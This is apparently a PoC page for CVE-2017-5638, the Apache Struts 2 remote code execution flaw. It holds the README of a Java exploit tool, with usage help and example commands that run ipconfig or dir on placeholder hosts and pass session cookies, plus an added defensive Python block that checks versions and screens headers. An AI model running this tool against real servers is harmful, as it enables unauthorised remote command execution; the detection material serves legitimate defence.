CVE-2017-5638 PoC — Apache Struts 2 Input Validation Error Vulnerability

Associated Vulnerability
Title: Apache Struts 2 Input Validation Error Vulnerability (CVE-2017-5638)
Description: The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
Readme
# struts2_cve-2017-5638

This is a sort of Java port of the Python exploit at: [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/).

This software is written to have no external dependencies.

## DISCLAIMER

**This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which anyone uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.**

## Vulnerability info

* **CVE-ID**: CVE-2017-5638
* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)
* **Description**: The Jakarta Multipart parser in **Apache Struts 2** 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted *Content-Type*, *Content-Disposition*, or *Content-Length* HTTP header, as exploited in the wild in March 2017 with a *Content-Type* header containing a *#cmd=* string.
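
For defenders, the description above translates into two checks: whether a deployed Struts version falls in the affected ranges, and whether the three named upload headers carry expression-like content. The following is an added example, not part of this project or the original exploit; the function names are hypothetical, and treating `%{` / `${` as expression delimiters is an assumption beyond what the description states.

```python
import re

# Fixed releases per branch, taken from the CVE description above:
# 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 are affected.
FIXED = {(2, 3): (2, 3, 32, 0), (2, 5): (2, 5, 10, 1)}

# "#cmd=" is the string named in the description; the "%{" / "${"
# expression delimiters are an added assumption, not from the page.
MARKERS = re.compile(r"[%$]\{|#cmd\s*=", re.IGNORECASE)


def is_affected(version):
    """True if a plain dotted Struts version falls in the affected ranges.

    Raises ValueError for non-numeric parts (e.g. '-SNAPSHOT' suffixes).
    """
    parts = tuple(int(p) for p in version.strip().split("."))
    fixed = FIXED.get(parts[:2])
    if fixed is None:
        return False  # branch not named in the CVE description
    padded = (parts + (0, 0, 0, 0))[:4]  # so 2.5.10 compares as 2.5.10.0
    return padded < fixed


def screen_headers(headers):
    """Return the lower-cased names of headers that should be rejected or logged."""
    hits = []
    for name, value in headers.items():
        key = name.lower()
        if key in ("content-type", "content-disposition"):
            if MARKERS.search(value):
                hits.append(key)
        elif key == "content-length":
            if not re.fullmatch(r"[0-9]+", value.strip()):
                hits.append(key)
    return hits


# Constructed sample requests (header dicts), not captured traffic.
SAMPLES = [
    {"Content-Type": "multipart/form-data; boundary=----abc", "Content-Length": "512"},
    {"Content-Type": "%{#cmd=PLACEHOLDER}", "Content-Length": "0"},
    {"Content-Type": "text/plain", "Content-Length": "10${x}"},
]

if __name__ == "__main__":
    for v in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(v, "affected" if is_affected(v) else "not affected")
    for sample in SAMPLES:
        print(screen_headers(sample))
```

Header screening of this kind is a detection and stop-gap measure; upgrading to 2.3.32 or 2.5.10.1 is the fix the description points to.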

## Help

```
Usage:
   java -jar struts2_cve-2017-5638.jar [options]
Description:
   Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
   -h, --help
      Prints this help and exits.
   -u, --url [target_URL]
      The target URL where the exploit will be performed.
   -cmd, --command [command_to_execute]
      The command that will be executed on the remote machine.
   --cookies [cookies]
      Optional. Cookies passed into the request, i.e. authentication cookies.
   -v, --verbose
      Optional. Increase verbosity.
```

## Examples

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
```

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
```

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
```

## Authors

* **Antonio Francesco Sardella** - *Java porting* - [m3ssap0](https://github.com/m3ssap0)

## License

This project is licensed under the MIT License - see the **LICENSE.txt** file for details.


## Acknowledgments

* [Vex Woo](https://www.exploit-db.com/author/?a=8906) for the original Python exploit.